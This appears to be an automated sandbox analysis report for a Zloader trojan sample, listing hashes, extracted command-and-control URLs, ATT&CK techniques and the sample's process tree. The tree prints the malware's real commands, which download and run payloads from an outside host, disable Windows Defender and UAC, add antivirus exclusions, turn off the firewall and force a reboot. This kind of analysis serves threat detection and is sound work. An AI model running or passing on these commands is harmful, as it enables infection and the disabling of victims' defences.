zloader | 7ba99f8f77a2e660f1837cad9d169ccf892154da5b2651e4e6e66efddd61944c

Analysis

max time kernel
60s
max time network
139s
platform
windows10_x64
resource
win10v20210410
submitted
12-08-2021 15:51

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

42a3e6ae86fe540cfc106f4edc55eccc.exe
Size

165KB
MD5

42a3e6ae86fe540cfc106f4edc55eccc
SHA1

5a43baf8b4e0150ad0228a13da2000311f36f823
SHA256

7ba99f8f77a2e660f1837cad9d169ccf892154da5b2651e4e6e66efddd61944c
SHA512

25d05657f8f927c438ff5240f9f29e8c695e13e8664e822f729c01055026b2ef66ccbebadc0931d5ba488ff369c6dbd1c09055b99ea0f374a37ff6c3bca665c4

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 4932 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

4004 regsvr32.exe

flow	pid	process
9	4932	powershell.exe

pid	process
4004	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

42a3e6ae86fe540cfc106f4edc55eccc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	42a3e6ae86fe540cfc106f4edc55eccc.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	42a3e6ae86fe540cfc106f4edc55eccc.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

4932 powershell.exe
4932 powershell.exe
4932 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4932 powershell.exe

pid	process
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4932	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

42a3e6ae86fe540cfc106f4edc55eccc.execmd.exeregsvr32.exe

description	pid	process	target process
PID 4456 wrote to memory of 4748	4456	42a3e6ae86fe540cfc106f4edc55eccc.exe	cmd.exe
PID 4456 wrote to memory of 4748	4456	42a3e6ae86fe540cfc106f4edc55eccc.exe	cmd.exe
PID 4748 wrote to memory of 4932	4748	cmd.exe	powershell.exe
PID 4748 wrote to memory of 4932	4748	cmd.exe	powershell.exe
PID 4748 wrote to memory of 4000	4748	cmd.exe	regsvr32.exe
PID 4748 wrote to memory of 4000	4748	cmd.exe	regsvr32.exe
PID 4000 wrote to memory of 4004	4000	regsvr32.exe	regsvr32.exe
PID 4000 wrote to memory of 4004	4000	regsvr32.exe	regsvr32.exe
PID 4000 wrote to memory of 4004	4000	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe
"C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:4004

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:3332

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1368

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:1592

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2732

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:3828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:3116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:1256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:4712

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:768

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:3956

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:4472

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c834ea553efb23bd10383d2c386d948e

SHA1
96d5d8ee49fc82957bb6898b9b73edaf090b8219

SHA256
0635417550df26fdb637cf067376290b8781d0787413d5b35ab19c784a220854

SHA512
1eb9dcaeb8f9bd04253555fa5f9e92ecca622b1f3888acba1057b39570e0370b636c6ba11bf79f213f6a69e8b9d95daab52d04071b6ac0379f7279543adff9c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d3ef3c5439a584b8d26dd4f8221c86f0

SHA1
4419283054bf2e1e8a160f6b7e0e4d145535013d

SHA256
02843dcba773e91dd08333e9fceeeca81ee55c230892e244596dba2e34d2fdde

SHA512
66176dd9b3d1e0e07ec7ec5820f6f043890de43514b1b5e7f35c42af37bf27b98a2e34bb58e42831fdacd109ed762d5121d333d7609f07244c0ab02200375c16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
139dc9c6dbbbdf067b642d2cfd709be3

SHA1
1e64ad397198857c5ba074ec865c9d939b60eb81

SHA256
a38e1b2b6d8781de8e982d4dde3709ba8e4fdcb1d156571dec0fd0b75b07a40c

SHA512
2afd8ba7371c78e4483814e76df5bca3c0dd1445263bd4dcb89e56c7d2769e236e1e84ed879b08d61d37c2ca49f3e8ba2c253f3fda43912cb12d6bbd04319443

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5b562e16ddaf20648bb7fc081a0009dd

SHA1
2f7b33a87a429e5528cc0ddce710885fbd1778bc

SHA256
ad46060621722952a96f4e0b22ef5b314fd972bf0eea82b92d271c6d7a771752

SHA512
9290837f321433f027190d5c2257642d1a1cf99fbe36c450c71b4eeb15c8fbc6a507af3c57c2bab0cddfd0e75411296fc17d7127d495dc8510498d045a497516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5fef339b4eb1903d80a4377c7150a227

SHA1
0eec44ffc032e387afb5de180677d5e23f72067f

SHA256
e728626a33965f9defa8d9777b50ab156333e8aaba715561d1f42f9477a9ab4a

SHA512
07d99a9d3fe7b7f98dfd7bed500ba1b6808cf707e019fabc0fc89bb6f8d06f3cbc5424a8d857b434ccb209b96518e36e24ce8f0702eb1abb2d6fcfc2a6fcb49a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ba16f31f982f83fb928c287f4a66e82d

SHA1
85934791624591515cd2b17bc973b69b8222620d

SHA256
6a38b964b328a74a48da3b6d620fc0999a836f4a4d9dd0a80aeeda52f9f26e69

SHA512
0ab8995265ca0399b845169ddbb1e3feade11697bc7594c273fe5f4cec6a99423c18568ffc16c2be41b435f6b09d1fcecea49675cbfedc9fc00cc6c5531547ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fbda4b14b846bd0d096c13e6a09aefdc

SHA1
fcb73518d1593b2eeb6620f16d8582d9e05018a4

SHA256
5d560642ae5c4aee299e765d8e90cbaeccaaf18a2e91ab3ca73ee1f5825e2b2f

SHA512
46e37000354e15be80c590d6d2b725917bfbe597324141e5308e9b0c810330ebd065a17779aedbf0bf373f6dabc5f4415305ca5111169dfacfe78aa0745b9ac7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dac44e6bb27a31954989e290be0633aa

SHA1
c37553ec5991de693ca688dc60834353a71d34a7

SHA256
5bdf8934a32f944ce931d5ebf60be707b6aa42ccb057a8cd94730e777a2a0c40

SHA512
891de9d222acd61a03a090905279fb9fec3daa73a10e0016f5d5e0f2f0b92fd1ea92cbd622a08097feeaf66d12bf9849f907be4e85ab3180cae8eefb95f208cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
65d0276b0b875c35d6f7f4392edfbcf3

SHA1
ffff4cc17297f04450053dfcbdb84675d7901e64

SHA256
ff5d2472e0d56563839f6001d6481ec99e202a03baafd7322408217eca51b387

SHA512
cefe32fe052d4dc4e6ae5672ab9e049fb1cf803fbcba3b5968d8831cb2e882a29b6f28df37d80caedc2894dff3b7d9fd84928d9c326f55aa6c04550e257ec2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
79bdb604f891fc100c3953030d43c22c

SHA1
2014b94d7766dc5455fb1be1e3a89e90e96ecc8c

SHA256
99908b02494fbf7de201d43a3c75941f693016ebfa48288490bb9566df499458

SHA512
c6d6dc9b8283ff54b24160571a766feb83ffa0ba6ef785516b55cf14634cb59c93726e3235a58a5a505f913dba9d13a3d933468219f788c398e11e693a167e07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b2272a4d79f95f2ce39f5635c60a6316

SHA1
a3b417e5fb946852e16545676768a90d51c94ae2

SHA256
29df5c70f40cd1ebba03fed7a06790056d9d6a7764737bf248fc0cc687cd50f4

SHA512
087a7b8d2fc127726ebbb874b772884b6c7fcc51e8a4ee0e3e6e7e1fb0a2115a7f05d4739495388e283c4d92b2eab898debffaaf97e358b5b14bf5784905a40c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c34a75db4acfc2cd667c7e5e91bb4259

SHA1
e42e7a9bb6afe5e86c9060daa3d4a58188b9b1f5

SHA256
d9c9cb499a702da40a1232aed7214da615497980645903689295f5f725f2a1ed

SHA512
911c8a7a17f866c4d86a59ca08ba3095600404945bb5f281094cb849550b45706ca7a07cedb4cb86c13db50bd96f3a08ac0926f529608f99fb58a25ad271a6fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
01d416e7915dfd9a2ca0301a02953a3b

SHA1
b53467be2ca6f37a1b871f9e8f1b1e60af24d72d

SHA256
1f2c81f0733961b7d585e68d31152ee2c32bbbadb081168ef6ecbb02b28bf061

SHA512
4f939988b52f4f2c4c2d9f55d2e3aa3cdf3e024fd2d97048982f0db4918f4198d1192f964a3000c063ceaa31b6fa85c72c150108ca63b66f6b29d046127428c6

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
a9dd9b9eff47af724436e2abdcd5ce6c

SHA1
1a9c9258f0345f5edddd933a7bd15ec42be51f8e

SHA256
cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

SHA512
28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
995c3f852ca1e81fc395a5c46b06cb9e

SHA1
0bc6bc2e425eef07669fa877573b9ba5513ae833

SHA256
81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

SHA512
62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
a9dd9b9eff47af724436e2abdcd5ce6c

SHA1
1a9c9258f0345f5edddd933a7bd15ec42be51f8e

SHA256
cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

SHA512
28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

Download Submit
memory/768-518-0x0000000000000000-mapping.dmp

Download
memory/796-392-0x000002561AFA6000-0x000002561AFA8000-memory.dmp

Filesize
8KB

Download
memory/796-349-0x0000000000000000-mapping.dmp

Download
memory/796-362-0x000002561AFA0000-0x000002561AFA2000-memory.dmp

Filesize
8KB

Download
memory/796-363-0x000002561AFA3000-0x000002561AFA5000-memory.dmp

Filesize
8KB

Download
memory/796-393-0x000002561AFA8000-0x000002561AFA9000-memory.dmp

Filesize
4KB

Download
memory/1068-394-0x000001FDA8A80000-0x000001FDA8A82000-memory.dmp

Filesize
8KB

Download
memory/1068-387-0x0000000000000000-mapping.dmp

Download
memory/1068-425-0x000001FDA8A86000-0x000001FDA8A88000-memory.dmp

Filesize
8KB

Download
memory/1068-395-0x000001FDA8A83000-0x000001FDA8A85000-memory.dmp

Filesize
8KB

Download
memory/1068-441-0x000001FDA8A88000-0x000001FDA8A89000-memory.dmp

Filesize
4KB

Download
memory/1256-479-0x000002A5A6350000-0x000002A5A6352000-memory.dmp

Filesize
8KB

Download
memory/1256-480-0x000002A5A6353000-0x000002A5A6355000-memory.dmp

Filesize
8KB

Download
memory/1256-466-0x0000000000000000-mapping.dmp

Download
memory/1256-506-0x000002A5A6356000-0x000002A5A6358000-memory.dmp

Filesize
8KB

Download
memory/1256-507-0x000002A5A6358000-0x000002A5A6359000-memory.dmp

Filesize
4KB

Download
memory/1368-167-0x0000000000000000-mapping.dmp

Download
memory/1528-169-0x0000000000000000-mapping.dmp

Download
memory/1572-427-0x0000000000000000-mapping.dmp

Download
memory/1572-443-0x000002BC41D13000-0x000002BC41D15000-memory.dmp

Filesize
8KB

Download
memory/1572-442-0x000002BC41D10000-0x000002BC41D12000-memory.dmp

Filesize
8KB

Download
memory/1572-444-0x000002BC41D16000-0x000002BC41D18000-memory.dmp

Filesize
8KB

Download
memory/1592-187-0x000002221EFB6000-0x000002221EFB8000-memory.dmp

Filesize
8KB

Download
memory/1592-177-0x000002221EFB0000-0x000002221EFB2000-memory.dmp

Filesize
8KB

Download
memory/1592-176-0x000002221EFB3000-0x000002221EFB5000-memory.dmp

Filesize
8KB

Download
memory/1592-170-0x0000000000000000-mapping.dmp

Download
memory/2260-459-0x0000022A651E0000-0x0000022A651E2000-memory.dmp

Filesize
8KB

Download
memory/2260-449-0x0000000000000000-mapping.dmp

Download
memory/2260-460-0x0000022A651E3000-0x0000022A651E5000-memory.dmp

Filesize
8KB

Download
memory/2260-478-0x0000022A651E6000-0x0000022A651E8000-memory.dmp

Filesize
8KB

Download
memory/2732-192-0x0000000000000000-mapping.dmp

Download
memory/2840-210-0x000001BD60AA6000-0x000001BD60AA8000-memory.dmp

Filesize
8KB

Download
memory/2840-209-0x000001BD60AA3000-0x000001BD60AA5000-memory.dmp

Filesize
8KB

Download
memory/2840-208-0x000001BD60AA0000-0x000001BD60AA2000-memory.dmp

Filesize
8KB

Download
memory/2840-196-0x0000000000000000-mapping.dmp

Download
memory/3116-309-0x0000024C60B58000-0x0000024C60B59000-memory.dmp

Filesize
4KB

Download
memory/3116-271-0x0000000000000000-mapping.dmp

Download
memory/3116-282-0x0000024C60B50000-0x0000024C60B52000-memory.dmp

Filesize
8KB

Download
memory/3116-308-0x0000024C60B56000-0x0000024C60B58000-memory.dmp

Filesize
8KB

Download
memory/3116-283-0x0000024C60B53000-0x0000024C60B55000-memory.dmp

Filesize
8KB

Download
memory/3332-145-0x0000000000000000-mapping.dmp

Download
memory/3332-174-0x0000019552C26000-0x0000019552C28000-memory.dmp

Filesize
8KB

Download
memory/3332-162-0x0000019552C23000-0x0000019552C25000-memory.dmp

Filesize
8KB

Download
memory/3332-161-0x0000019552C20000-0x0000019552C22000-memory.dmp

Filesize
8KB

Download
memory/3828-194-0x0000000000000000-mapping.dmp

Download
memory/3956-522-0x0000000000000000-mapping.dmp

Download
memory/4000-136-0x0000000000000000-mapping.dmp

Download
memory/4004-141-0x0000000010000000-0x0000000010129000-memory.dmp

Filesize
1.2MB

Download
memory/4004-138-0x0000000000000000-mapping.dmp

Download
memory/4004-140-0x0000000000590000-0x00000000006DA000-memory.dmp

Filesize
1.3MB

Download
memory/4224-142-0x0000000000000000-mapping.dmp

Download
memory/4224-160-0x0000000000AF0000-0x0000000000B16000-memory.dmp

Filesize
152KB

Download
memory/4388-266-0x0000014E86A50000-0x0000014E86A52000-memory.dmp

Filesize
8KB

Download
memory/4388-234-0x0000000000000000-mapping.dmp

Download
memory/4388-280-0x0000014E86A58000-0x0000014E86A59000-memory.dmp

Filesize
4KB

Download
memory/4388-267-0x0000014E86A53000-0x0000014E86A55000-memory.dmp

Filesize
8KB

Download
memory/4388-268-0x0000014E86A56000-0x0000014E86A58000-memory.dmp

Filesize
8KB

Download
memory/4520-361-0x0000029838BA8000-0x0000029838BA9000-memory.dmp

Filesize
4KB

Download
memory/4520-343-0x0000029838BA0000-0x0000029838BA2000-memory.dmp

Filesize
8KB

Download
memory/4520-311-0x0000000000000000-mapping.dmp

Download
memory/4520-344-0x0000029838BA3000-0x0000029838BA5000-memory.dmp

Filesize
8KB

Download
memory/4520-345-0x0000029838BA6000-0x0000029838BA8000-memory.dmp

Filesize
8KB

Download
memory/4712-519-0x0000024F1EDD0000-0x0000024F1EDD2000-memory.dmp

Filesize
8KB

Download
memory/4712-523-0x0000024F1EDD6000-0x0000024F1EDD8000-memory.dmp

Filesize
8KB

Download
memory/4712-520-0x0000024F1EDD3000-0x0000024F1EDD5000-memory.dmp

Filesize
8KB

Download
memory/4712-508-0x0000000000000000-mapping.dmp

Download
memory/4748-114-0x0000000000000000-mapping.dmp

Download
memory/4932-125-0x0000020C28E40000-0x0000020C28E42000-memory.dmp

Filesize
8KB

Download
memory/4932-116-0x0000000000000000-mapping.dmp

Download
memory/4932-121-0x0000020C415A0000-0x0000020C415A1000-memory.dmp

Filesize
4KB

Download
memory/4932-124-0x0000020C41650000-0x0000020C41651000-memory.dmp

Filesize
4KB

Download
memory/4932-126-0x0000020C28E43000-0x0000020C28E45000-memory.dmp

Filesize
8KB

Download
memory/4932-134-0x0000020C28E46000-0x0000020C28E48000-memory.dmp

Filesize
8KB

Download